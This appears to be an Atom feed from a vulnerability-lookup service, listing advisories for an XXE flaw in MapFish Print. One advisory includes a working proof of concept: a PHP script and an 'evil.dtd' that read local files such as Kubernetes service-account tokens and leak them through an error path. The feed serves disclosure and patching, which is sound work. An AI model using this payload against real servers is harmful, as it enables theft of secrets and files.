<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T08:10:05.156166+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-361775</id>
    <title>EUVD-2026-361775</title>
    <updated>2026-10-08T08:10:05.158320+00:00</updated>
    <content>EUVD-2026-361775</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-361775"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-55848</id>
    <title>fkie_cve-2026-55848</title>
    <updated>2026-10-08T08:10:05.158359+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-55848"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-5v29-34h8-v68r</id>
    <title>GHSA-5v29-34h8-v68r — MapFish Print has XXE that allows reading arbitrary files of certain types</title>
    <updated>2026-10-08T08:10:05.158395+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: org.mapfish.print:print-lib, Maven: org.mapfish:print.print-servlet, Maven: org.mapfish.print:print-servlet</p>
<p>### Summary
XXE on MapFish Print allows reading arbitrary files of certain types. Eg /etc/passwd or k8 secrets and certs.</p>
<p>https://github.com/mapfish/mapfish-print/commit/13020c0fbc299e5f604e4e66066311c4bf04d507</p>
<p>### Details
To trigger the XXE it is required to host a remote script and dtd file. When using the Print feature its possible to send the attacker server url as url of the gml layer.</p>
<p>The 404 not found path when using the gml Layer will expand the content of the file as path and throw a default 404 with the full content as path.</p>
<p>### PoC
Host this php file somewhere as xxe.php:</p>
<p>```
&lt;?php
$p=$_GET['p'];
$d=dirname($_SERVER['SCRIPT_NAME']);
$u=(empty($_SERVER['HTTPS'])?'http':'https')."://{$_SERVER['HTTP_HOST']}$d/evil.dtd";
header('Content-Type: application/xml');
echo "&lt;?xml version=\"1.0\"?&gt;
&lt;!DOCTYPE x [
 &lt;!ENTITY % payload SYSTEM \"file://$p\"&gt;
 &lt;!ENTITY % dtd SYSTEM \"$u\"&gt;
 %dtd;
]&gt;
&lt;wfs:FeatureCollection xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:gml=\"http://www.opengis.net/gml\"&gt;
&lt;!-- ".str_repeat('x',200)." --&gt;
&lt;gml:boundedBy&gt;&lt;gml:null&gt;unknown&lt;/gml:null&gt;&lt;/gml:boundedBy&gt;
&lt;/wfs:FeatureCollection&gt;";
```</p>
<p>and beneath host this "evil.dtd"</p>
<p>`&lt;!ENTITY % exfil "&lt;!ENTITY &amp;#37; error SYSTEM 'file:///xxe-exfil/%payload;'&gt;"&gt;
%exfil;
%error;`</p>
<p>Now send a single curl request against your mapfish print server and include your hosted poc url as gml layer url with the path attached you would like to exfil. It will exfil /var/run/secrets/kubernetes.io/serviceaccount/tok…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-5v29-34h8-v68r"/>
  </entry>
</feed>
